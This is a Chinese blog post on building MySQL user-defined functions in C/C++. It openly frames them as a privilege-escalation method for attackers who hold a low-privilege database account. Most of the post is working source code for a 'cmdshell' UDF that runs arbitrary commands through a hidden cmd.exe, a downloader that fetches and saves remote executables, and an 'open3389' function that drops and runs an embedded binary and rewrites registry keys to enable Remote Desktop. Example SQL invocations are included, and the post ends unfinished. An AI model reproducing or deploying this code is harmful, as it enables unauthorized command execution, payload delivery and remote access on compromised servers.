UDF开发过程及其细节

最新推荐文章于 2024-01-03 17:36:59 发布
最新推荐文章于 2024-01-03 17:36:59 发布
阅读量1.4k 收藏
点赞数
分类专栏: mysql 工具开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ask_man/article/details/37651685
版权

UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。

原理

  MySQL添加新函数:

1.自定义函数(UDF):使得UDF机制能够起作用,必须使用C或者C++编写函数,系统必须支持动态加载。UDF中xxx函数的编写,来实现接口的C/C++ 函数如下:

(1)xxx() (必有):主函数。

SQL 类型 C/C++ 类型

STRINGchar *

INTEGERlong long

REALdouble

(2)xxx_init() (可选):初始化函数

检查传递给xxx()的参量数目。

检查参量是否为必需的类型,或者,除此之外,在主函数被调用的时候告诉MySQL将参量强制为想要的类型。

分配主函数需要的内存。

指定结果的最大长度。

指定(对于REAL 函数)小数的最多位数。

指定结果是否可以为 NULL

(3)xxx_deinit() (可选):去初始化,释放初始化函数分配的内存。

  (4)xxx_clear()未研究

  (5)xxx_add() 未研究

      2.创建存储函数

注意事项:

1.主函数xxx()

对于STRING 型函数:

char *xxx(UDF_INIT *initid, UDF_ARGS *args,

         char *result, unsigned long *length,

         char *is_null, char *error);

对于INTEGER型函数:

long long xxx(UDF_INIT *initid, UDF_ARGS *args,

             char *is_null, char *error);

对于REAL型函数:

double xxx(UDF_INIT *initid, UDF_ARGS *args,

             char *is_null, char *error);

2.UDF变量类型说明UDF_INIT、 UDF_ARGS、my_bool

type char my_bool

enum Item_result {STRING_RESULT=0, REAL_RESULT, INT_RESULT, ROW_RESULT,DECIMAL_RESULT};

typedef struct st_udf_args

{

  unsigned int arg_count; /* Number of arguments- -参数个数 */

  enum Item_result *arg_type; /* Pointer to item_results --参数类型*/

  char **args; /* Pointer to argument--参数指针 */

  unsigned long *lengths; /* Length of string arguments--参数长度 */

  char *maybe_null; /* Set to 1 for all maybe_null args --1表示空,是否表示空*/

  char **attributes;                    /* Pointer to attribute name --参数属性的指针*/

  unsigned long *attribute_lengths;     /* Length of attribute arguments --指向内容的长度*/

  void *extension; /*扩展指针*/

} UDF_ARGS;


 typedef struct st_udf_init

{

  my_bool maybe_null;          /* 1 if function can return NULL--返回值可为空 */

  unsigned int decimals;       /* for real functions --设置小数点后长度*/

  unsigned long max_length;    /* For string functions --结果返回最大长度*/

  char *ptr;                   /* free pointer for function data --字符指针,一般init内分配的内存地址给ptr*/

  my_bool const_item;          /* 1 if function always returns the same value --是否返回固定结果*/

  void *extension;

} UDF_INIT;

3.查看3389是否开启:netstat -ano -p tcp | find "3389" >nul 2>nul && echo 3389 open! || echo 3389 not open!

流程

1.安装mysqlsdk

2.vc6.0,;其中从sdk中添加额外的头文件:mysql.h、my_alloc.h、my_list.h、mysql_com.h、mysql_time.h、mysql_version.h。

3.参考mysql-udf文档:http://dev.mysql.com/doc/refman/5.1/zh/extending-mysql.html#udf-calling

细节

MYSQL有一个开发包,它定义了自己的接口,变量类型,以及函数执行顺序.根据提权,UDF大致功能有:cmdshell、downloader、open3389 、backshell 、ProcessView 、KillProcess regread regwrite 、 关机,注销,重启、about

    UDF函数使用:CREATE function 函数  returns string soname 'myudf.dll';select 函数(参数)

    cmdshell:create function cmdshell returns string soname 'myudf.dll'; select cmdshell('netstat');

    download: create function download returns string soname 'myudf.dll'; select download('http://10.0.0.1/a.exe','d:\\c.exe');


程序代码:

      【cmdshell】

extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)  

{

    //return 1出错 ,0 正常  

  initid->max_length=65*1024*1024;  

  return 0;  

}  

extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)  

{  


  if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)  

  {  

    initid->ptr=(char *)malloc(200);  

    if(initid->ptr==NULL)return NULL;  

    strcpy(initid->ptr,"执行CMD Shell函数.\r\n:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");  

    *length=strlen(initid->ptr);  

    return initid->ptr;  

  }  


  int RunStatus=0;  

  char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];  

  DWORD size=0,len;  

  HANDLE hFile;  

  GetSystemDirectory(ShellPath,MAX_PATH-1);  

  strcat(ShellPath,"\\cmd.exe");  

  GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);  

  strcat(TempFilePath,"\\2351213.tmp");  

  cmdline=(char *)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);  

    //形成命令:‘cmd  /c  命令  >  临时文件’

 strcpy(cmdline," /c ");  

  strcat(cmdline,(args->args)[0]);  

  strcat(cmdline,">");  

  strcat(cmdline,TempFilePath);  


  STARTUPINFO si;                    //结构用于指定新进程的主窗口特性

  PROCESS_INFORMATION pi;  //创建进程时相关的数据结构之一,该结构返回有关新进程及其主线程的信息

  ZeroMemory( &si, sizeof(si) );  

  si.wShowWindow=SW_HIDE;  

  si.cb = sizeof(si);  

  ZeroMemory( &pi, sizeof(pi) );  

  RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);  

  free(cmdline);  

  if(!RunStatus)  

  {  

    itoa(GetLastError(),temp,10);  

    sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);  

    initid->ptr=(char *)malloc(strlen(temp)+1);  

    strcpy(initid->ptr,temp);  

    (*length)=strlen(initid->ptr);  

    return initid->ptr;  

  }  

  WaitForSingleObject(pi.hProcess,30000);  

  //获得结果  

  hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);  

  if(hFile!=INVALID_HANDLE_VALUE)  

  {  

    size=GetFileSize(hFile,NULL);  

    initid->ptr=(char *)malloc(size+100);  

    ReadFile(hFile,initid->ptr,size+1,&len,NULL);  

    (initid->ptr)[size]='\0';  

    strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");  

    CloseHandle(hFile);  

    DeleteFile(TempFilePath);  

  }  

  else  

  {  

    initid->ptr=(char *)malloc(100);  

    strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");  

  }  

  (*length)=strlen(initid->ptr);  

  return initid->ptr;  

}  

extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)  

{  

  if(initid->ptr!=NULL)  

   free(initid->ptr);  

}  

【download】

extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)  
{//return 1出错 ,0 正常  
  initid->max_length=65*1024*1024;  
  return 0;  
}  
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)  
{  
  if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || stricmp(args->args[0],"help")==0)  
  {  
    initid->ptr=(char *)malloc(200);  
    if(initid->ptr==NULL)return NULL;  
    strcpy(initid->ptr,"下载者函数\r\n:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  

  HANDLE hFile;  
  char path[MAX_PATH];  


  strcpy(path,(args->args)[1]);  
    
  hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,Create_ALWAYS,0,NULL);  
  if(hFile==INVALID_HANDLE_VALUE)  
  {  
    initid->ptr=(char *)malloc(100+strlen(path));  
    sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
  CloseHandle(hFile);  
  DeleteFile(path);  
    
  if(URLDownloadToFile(NULL,(args->args)[0],path,0,0)==S_OK)  
  {  
    initid->ptr=(char *)malloc(50+strlen(path));  
    sprintf(initid->ptr,"下载文件成功(%s).",path);  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
  else  
  {  
    initid->ptr=(char *)malloc(100+strlen((args->args)[0]));  
    sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[0]);  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  

}  
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)  
{  
  if(initid->ptr)  
    free(initid->ptr);  
}  

【open3389】

extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)  
{//return 1出错 ,0 正常  
  initid->max_length=65*1024*1024;  
  return 0;  
}  
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)  
{  
  if(!(args->arg_count==0 ||(args->arg_count==1 && args->arg_type[0]==INT_RESULT)))  
  {  
    initid->ptr=(char *)malloc(200);  
    if(initid->ptr==NULL)return NULL;  
    strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.\r\n:select open3389([端口]);");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  

  HRSRC hrsrc1;  
  HGLOBAL hglobal1;  
  HANDLE hFile;  
  char path[MAX_PATH];  
  DWORD size,size2;  

  GetEnvironmentVariable("temp",path,MAX_PATH-1);  
  strcat(path,"\\457391.exe");  

  hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");  
  if(hrsrc1==NULL)  
  {  
    initid->ptr=(char *)malloc(100);  
    strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
  size=SizeofResource((HMODULE)g_module, hrsrc1);  
  hglobal1=LoadResource((HMODULE)g_module, hrsrc1);  
  if(hglobal1==NULL)  
  {  
    initid->ptr=(char *)malloc(100);  
    strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  


  hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);  
  if(hFile==INVALID_HANDLE_VALUE)  
  {  
    initid->ptr=(char *)malloc(100);  
    strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
  WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);  
  CloseHandle(hFile);  
  GlobalFree(hglobal1);  



  STARTUPINFO si;  
  PROCESS_INFORMATION pi;  
  ZeroMemory( &si, sizeof(si) );  
  si.wShowWindow=SW_HIDE;  
  si.cb = sizeof(si);  
  ZeroMemory( &pi, sizeof(pi) );  
  bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,0,0,0,&si,&pi);  
  if(!RunStatus)  
  {  
    DeleteFile(path);  
    initid->ptr=(char *)malloc(100);  
    strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
  WaitForSingleObject(pi.hProcess,5000);  
  DeleteFile(path);  
  //改端口  
  if(args->arg_count!=0 && args->arg_type[0]==INT_RESULT)  
  {  
    HKEY key;  
    DWORD dwDisposition;  
    DWORD port=*((long long *) args->args[0]);  

    RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);  
    if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))  
    {  
      RegCloseKey(key);  
      RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);  
      if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))  
      {  
        RegCloseKey(key);  
        initid->ptr=(char *)malloc(100);  
        sprintf(initid->ptr,"成功开启3389终端服务....\r\n成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);  
        *length=strlen(initid->ptr);  
        return initid->ptr;  
      }  
    }  
    RegCloseKey(key);  
    initid->ptr=(char *)malloc(100);  
    sprintf(initid->ptr,"成功开启3389终端服务....\r\n修改终端服务端口失败.");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
      
  }  
  else  
  {  
    initid->ptr=(char *)malloc(100);  
    sprintf(initid->ptr,"成功开启3389终端服务.\r\n");  
    *length=strlen(initid->ptr);  
    return initid->ptr;  
  }  
}  
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)  
{  
  if(initid->ptr)  
    free(initid->ptr);  
}  

。。。待续

ask_man
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UDF(PYTHON / JAVA)入门级开发
小小良
07-07 1798
开发前的声明 udf开发是在数据分析的时候如果内置的函数解析不了的情况下去做的开发,比方说你只想拆分一个字段,拼接一个字段之类的,就不要去搞udf了,这种基本的需求自带函数完全支持,具体参数可参考文档: http://spark.apache.org/docs/latest/api/sql/search.html?q=cast 里面列举了所有函数的介绍和使用,推荐优先使用官方推出的,因为自己写的udf如果对一些异常处理不到位可能会导致数据分析的失败或者意...
UDF函数开发流程
qiubaifeng的博客
06-13 2030
1。首先编写UDF 继承: org.apache.hadoop.hive.ql.exec.UDF; 需要导入hive-exec-0.13.1-cdh5.3.6.jar 包及hadoop-common-2.5.0-cdh5.3.6.jar eg:package com.paic.nets.pnc.udf; import java.text.SimpleDateFormat;...
【大数据笔记】- Hive UDF开发超简单教程
foxofwind的博客
03-23 4554
1.Hive UDF就是自定义函数,有两个不同的接口可以实现。 自定义函数类别分为以下三种: (1)UDF 一进一出 (2)UDAF 聚集函数,多进一出 类似于:count/max/min (3)UDTF 一进多出 本文主要介绍UDF,比较简单,直接上代码。 2.新建项目 新建一个idea的maven的java项目,自行百度就可以了,可以参考下面的 idea-新建Maven Java工程 - MmeChan - 博客园 3.pom.xml文件配置: <dependen.
Hive UDF开发指南
数仓老六
07-14 1186
UDF(user defined functions)是用户定义函数,UDF操作作用于单个数据行,并且产生单个数据行作为输出。大多数函数都属于这一类(比如数学函数和字符串函数)。实现UDF需要继承特定类UDF或GenericUDF二选一。apache.hadoop.hive.ql.exec.UDF,处理并返回基本数据类型,int、string、boolean、double等;(也可以返回复杂数据类型)
如何编写udf函数(收藏篇)
weixin_38003620的博客
04-13 2309
去Maven仓库(https://mvnrepository.com/)下载需要的jar包以及复制所需要的依赖信息。hive自带了一些函数,比如:max、min 等,但是自带的函数数量有限,所以hive提供给用户自定义函数的功能。由于我们udf函数需要打的是jar包,一路next保存之后,需要修改下pom.xml文件,后面才能打jar包。maven不需要安装,idea自带,我们只需要下载依赖(引入需要的jar包,配置文件加上依赖信息)我的电脑>属性>高级系统设置>环境变量>系统变量。
ANSYS Fluent UDF二次开发手册.pdf
01-07
3. **UDF数据访问宏**:这部分深入到UDF的编程细节,介绍了数据访问宏,包括节点、面、单元数据的访问,以及拓扑关系的处理。此外,还有循环迭代宏,用于遍历不同层次的网格结构,以及向量和标量运算宏,支持时间和...
Hive UDF开发
12-27
详细介绍如何开发hive自定义永久函数,配套有测试数据
java UDF开发分享
03-17
hadoop 处理数据时子带函数可能不满足平常的分析需求,需要自己开发自定义的函数支持业务需求
Fluent UDF中文手册_ds2780中文手册
01-08
2、UDF的C语言基础 3、编写UDF 4、DEFINE宏 5、使用宏访问各类变量 6、针对FLUENT变量性能计算的FLUENT公司提供的预处理工具列表 7、UDF的编译与链接 8、在FLUENT中激活你的UDF 9、FLUENT 中用户自定义标量及它们的...
Fluent_UDF_中文教程
01-07
适用于Fluent用户想要编写UDF的中文教程,通过系统学习会对UDF能够有基本的认知,结合案例后可以掌握UDF的使用方法。
10分钟学会Hive之用户自定义函数UTF开发
搞数据
09-13 567
用户自定义函数概述用户自定义函数简称UDF,源自于英文user-defined function。
【Apache Doris】自定义函数之 JAVA UDF 详解
ith321的博客
12-30 3378
【Apache Doris】自定义函数之 JAVA UDF 详解
UDF开发入门(python udf、hive udf
LouisLee 的博客
02-17 2045
开发前的声明         udf开发是在数据分析的时候如果内置的函数解析不了的情况下去做的开发,比方说你...
Hive自定义UDF函数及使用
小健的博客
01-30 2885
UDF全称:User-Defined Functions,即用户自定义函数,在Hive SQL编译成MapReduce任务时,执行java方法,类似于像MapReduce执行过程中加入一个插件,方便扩展。
Hive之udf开发日记
weixin_51104399的博客
06-03 646
Java sql解析,提取表名 hive udf开发流程
Hive UDF函数构建(之一)
weixin_42289266的博客
06-16 505
UDF函数构造一、概述二、UDF类型三、UDF开发流程1、继承UDF类或GenericUDF类2、重写evaluate()方法并实现函数逻辑3、编译打包为jar文件4、复制到正确的HDFS路径5、使用jar创建临时/永久函数6、调用函数 一、概述 UDF函数其实就是一个简单的函数,执行过程就是在Hive转换成MapReduce程序后,执行java方法,类似于像MapReduce执行过程中加入一个插件,方便扩展。UDF只能实现一进一出的操作,如果需要实现多进一出,则需要实现UDAF。 Hive可以允许用户编写
udf开发入门(python udf、hive udf
热门推荐
liu82327114的博客
06-12 3万+
开发前的声明 udf开发是在数据分析的时候如果内置的函数解析不了的情况下去做的开发,比方说你只想拆分一个字段,拼接一个字段之类的,就不要去搞udf了,这种基本的需求自带函数完全支持,具体参数可参考文档: http://spark.apache.org/docs/latest/api/sql/search.html?q=cast 里面列举了所有函...
Hive用户自定义函数之UDF开发
最新发布
flash_love的博客
01-03 1332
在进行大数据分析或者开发的时候,难免用到Hive进行数据查询分析,Hive内置很多函数,但是会有一部分需求需要自己开发,这个时候就需要自定义函数了,Hive的自定义函数开发非常方便,今天首先讲一下UDF的入门开发
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3850
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
Java开发UDF函数
05-12
UDF(User-Defined Function)是用户自定义函数,是Hive中的一种扩展功能。UDF可以让用户定义自己的函数,这些函数可以被Hive SQL语句调用,以实现更复杂的数据处理操作。 下面是一个Java开发UDF函数的示例: 1. 创建Java项目,导入hive-exec和hive-common的依赖。 2. 创建类名为MyUDF的Java类,继承org.apache.hadoop.hive.ql.exec.UDF。 3. 实现evaluate()方法,并根据需要添加其他方法和属性。 ```java package com.example; import org.apache.hadoop.hive.ql.exec.UDF; public class MyUDF extends UDF { public int evaluate(int num) { // 实现UDF的逻辑 return num * 2; } } ``` 4. 打包项目成jar文件并上传到Hive服务器上。 5. 在Hive中注册UDF,使用以下命令: ```sql CREATE FUNCTION my_udf AS 'com.example.MyUDF' USING JAR 'path/to/my-udf.jar'; ``` 6. 在Hive中使用UDF,例如: ```sql SELECT my_udf(10); ``` 上述示例中,创建了一个名为MyUDF的类,实现了一个evaluate()方法,该方法接受一个整数参数并将其乘以2。然后将项目打包成jar文件,并上传到Hive服务器上。最后,在Hive中注册UDF并使用它。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值